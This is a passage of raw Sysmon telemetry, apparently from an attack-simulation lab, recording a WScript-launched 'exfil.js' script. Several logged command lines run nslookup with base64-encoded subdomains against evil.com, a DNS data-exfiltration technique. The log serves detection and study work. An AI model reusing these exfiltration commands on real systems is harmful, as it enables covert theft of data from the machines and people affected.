10341000x8000000000000000206044Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:22.797{2E1864BB-18E0-629A-6742-000000005F02}39764816C:\Windows\System32\WScript.exe{2E1864BB-18E2-629A-6B42-000000005F02}5620C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206043Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:22.797{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000206042Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:22.807{2E1864BB-18E2-629A-6B42-000000005F02}5620C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nluzhc.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000206041Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:22.797{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nldpeq.tmpMD5=2F8701F387AF2110E32408D0F4A242C3,SHA256=6A2A0ACD9892C9D73119665C3163E4FB9119D009FEA0026931DDF4E05E5C0E6D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000206040Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:22.760{2E1864BB-18E2-629A-6942-000000005F02}63723636C:\Windows\system32\conhost.exe{2E1864BB-18E2-629A-6A42-000000005F02}5836C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206039Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:22.744{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206038Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:22.744{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206037Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:22.744{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206036Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:22.744{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18E2-629A-6A42-000000005F02}5836C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000206035Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:22.744{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206034Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:22.744{2E1864BB-18E2-629A-6842-000000005F02}58962328C:\Windows\system32\cmd.exe{2E1864BB-18E2-629A-6A42-000000005F02}5836C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000206033Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:22.756{2E1864BB-18E2-629A-6A42-000000005F02}5836C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A Kioqd2luMzJfY29tcHV0ZXJzeXN0ZW0qKio= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18E2-629A-6842-000000005F02}5896C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Kioqd2luMzJfY29tcHV0ZXJzeXN0ZW0qKio= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nldpeq.tmp 2>&1 10341000x8000000000000000206032Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:22.728{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-18E2-629A-6942-000000005F02}6372C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206031Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:22.728{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18E2-629A-6942-000000005F02}6372C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206030Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:22.728{2E1864BB-18E2-629A-6942-000000005F02}63723636C:\Windows\system32\conhost.exe{2E1864BB-18E2-629A-6842-000000005F02}5896C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206029Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:22.713{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18E2-629A-6942-000000005F02}6372C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000206028Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:22.713{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18E2-629A-6842-000000005F02}5896C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000206027Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:22.713{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206026Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:22.713{2E1864BB-18E0-629A-6742-000000005F02}39765364C:\Windows\System32\WScript.exe{2E1864BB-18E2-629A-6842-000000005F02}5896C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206025Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:22.713{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206024Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:22.713{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206023Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:22.713{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000206022Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:22.715{2E1864BB-18E2-629A-6842-000000005F02}5896C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Kioqd2luMzJfY29tcHV0ZXJzeXN0ZW0qKio= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nldpeq.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 10341000x8000000000000000206021Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:22.697{2E1864BB-E13C-6299-0B00-000000005F02}6364072C:\Windows\system32\lsass.exe{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\WScript.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+262f7|C:\Windows\system32\lsasrv.dll+2743d|C:\Windows\system32\lsasrv.dll+26175|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206020Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:22.697{2E1864BB-E13C-6299-0B00-000000005F02}6364072C:\Windows\system32\lsass.exe{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\WScript.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2c06f|C:\Windows\system32\lsasrv.dll+260bd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000206019Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:22.594{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A72ABA1887D8498C583FFE7FCB86DBE7,SHA256=37B27810DAE34375D73593D7D00A9B67E4D5000244D9F51A5E4F15ADC5E1D209,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000206018Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:19.841{2E1864BB-E1C6-6299-D800-000000005F02}3988C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local56422-false10.0.1.12-8000- 23542300x800000000000000044791Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:23.533{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=081899AE3A0DECDE03C8199F191BFA79,SHA256=FB4BCF0D47032504F7B1CB8B0FC0BC195CFAF7BF963EC9A08C8309039C272C94,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000206209Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.986{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlkfuh.tmpMD5=B2B1D75715AF357A6B4398F385A141DD,SHA256=A1FA40C2F8588360C75C13349E8A2F679279989093D68809396DFBEE5B7D57B5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000206208Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.916{2E1864BB-18E3-629A-8042-000000005F02}78083008C:\Windows\system32\conhost.exe{2E1864BB-18E3-629A-8142-000000005F02}5352C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206207Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:23.901{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000206206Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 